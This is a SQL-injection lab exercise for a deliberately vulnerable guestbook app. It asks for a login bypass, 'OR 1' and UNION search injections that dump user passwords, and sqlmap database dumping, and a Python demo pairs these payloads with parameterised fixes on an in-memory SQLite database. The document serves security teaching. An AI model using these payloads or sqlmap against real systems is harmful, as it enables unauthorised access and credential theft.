Exercise: SQL-Injection

Solutions for this exercise

Install our demo-application

Download and install our guestbook application (The Guestbook Example). Be very careful: this application is deliberately vulnerable and unstable. Never install it on a server that other people can reach, and configure your firewall so that it is only accessible from your own machine.

Test the application

For your tests, you can use the user harry (password Potter) or the user emmanuel (password emmanuel).
You can send a message to one person or to a list of persons.

Use SQL-injection to hack the login

Try to log in as the user benoist without using his password (it is bcde).

Search field

Using the search functionality of the guestbook application, try to make it execute queries it was not designed for.
  • Change the search term so that it adds an "or 1" condition that makes the WHERE clause always true. You may need to read the source code to see how the query is built before you write the payload. Normally a user only sees the messages that he or she has the right to see; after the injection you should see everyone's messages.
  • Exploit the search functionality further (for example with a UNION) so that you can see the list of all users with their passwords.
  • Install and run sqlmap

    • Download and install SQLmap,
      $ sudo apt install sqlmap
      
    • Find an entry point that suffers from SQL injection. You will have to test several candidate entry points (login fields, the search field, the message form) before you find a vulnerable one.
    • Start sqlmap against your application. You may use the wizard mode, which asks you for the target URL and the options step by step.
    • Retrieve the database structure (databases, tables and columns) of the site.
    • Dump the contents of the database.
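The following is an added example, not code from the guestbook application, that reproduces the two manual attacks of this exercise (the login bypass from the previous section and the two search-field injections above) against a constructed in-memory SQLite database. The table and column names (users, messages, login, password, recipient, body) are assumptions, since the page does not show the real schema; the guestbook may use MySQL, where the comment and string-concatenation syntax differs slightly, as noted in the comments. Each vulnerable function is paired with the parameterised version that defeats the payload.

```python
import sqlite3

# Constructed stand-in for the guestbook's database. The real application's
# table and column names are not given on this page; these are assumptions.
# Users and passwords are the ones mentioned in the exercise text.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT);
CREATE TABLE messages (id INTEGER PRIMARY KEY, recipient TEXT, body TEXT);
INSERT INTO users (login, password) VALUES
  ('harry', 'Potter'), ('emmanuel', 'emmanuel'), ('benoist', 'bcde');
INSERT INTO messages (recipient, body) VALUES
  ('harry', 'hello harry'), ('emmanuel', 'bonjour'), ('benoist', 'secret for benoist');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- Vulnerable versions: the query is built by string interpolation ---

def login_vulnerable(conn, user, pw):
    sql = f"SELECT login FROM users WHERE login = '{user}' AND password = '{pw}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, current_user, term):
    # Intended behaviour: only messages addressed to the logged-in user.
    sql = (f"SELECT body FROM messages WHERE recipient = '{current_user}' "
           f"AND body LIKE '%{term}%'")
    return [r[0] for r in conn.execute(sql)]


# --- Hardened versions: placeholders, so user input is never parsed as SQL ---

def login_safe(conn, user, pw):
    row = conn.execute(
        "SELECT login FROM users WHERE login = ? AND password = ?", (user, pw)
    ).fetchone()
    return row[0] if row else None


def search_safe(conn, current_user, term):
    rows = conn.execute(
        "SELECT body FROM messages WHERE recipient = ? AND body LIKE ?",
        (current_user, f"%{term}%"),
    )
    return [r[0] for r in rows]


# Payloads. "-- " comments out the rest of the statement; SQLite and MySQL
# both accept "-- " followed by a space, and MySQL also accepts "#".
LOGIN_BYPASS = "benoist' -- "      # closes the login literal, drops the password check
SEARCH_ALL = "' OR 1 -- "          # AND binds tighter than OR, so "OR 1" makes the WHERE true
# UNION needs the same column count as the original SELECT (one column here).
# "||" is SQLite string concatenation; on MySQL use CONCAT(login, ':', password).
SEARCH_DUMP_USERS = "' UNION SELECT login || ':' || password FROM users -- "


if __name__ == "__main__":
    conn = make_db()
    print("login bypass :", login_vulnerable(conn, LOGIN_BYPASS, "anything"))
    print("own messages :", search_vulnerable(conn, "harry", "hello"))
    print("or 1         :", search_vulnerable(conn, "harry", SEARCH_ALL))
    print("union dump   :", search_vulnerable(conn, "harry", SEARCH_DUMP_USERS))
    print("safe login   :", login_safe(conn, LOGIN_BYPASS, "anything"))
    print("safe search  :", search_safe(conn, "harry", SEARCH_ALL))
```

Reading the generated SQL for each payload is the whole exercise: with LOGIN_BYPASS the statement becomes `... WHERE login = 'benoist' -- ' AND password = 'anything'`, so the password clause is dead text; with SEARCH_ALL the recipient restriction is ANDed to a LIKE and then ORed with a constant true; with SEARCH_DUMP_USERS the second SELECT simply appends one row per user to the result. The parameterised versions return nothing for the same inputs because the quote and the comment marker are sent as data, not as SQL. When you move to sqlmap, these are the same payload families it tries automatically.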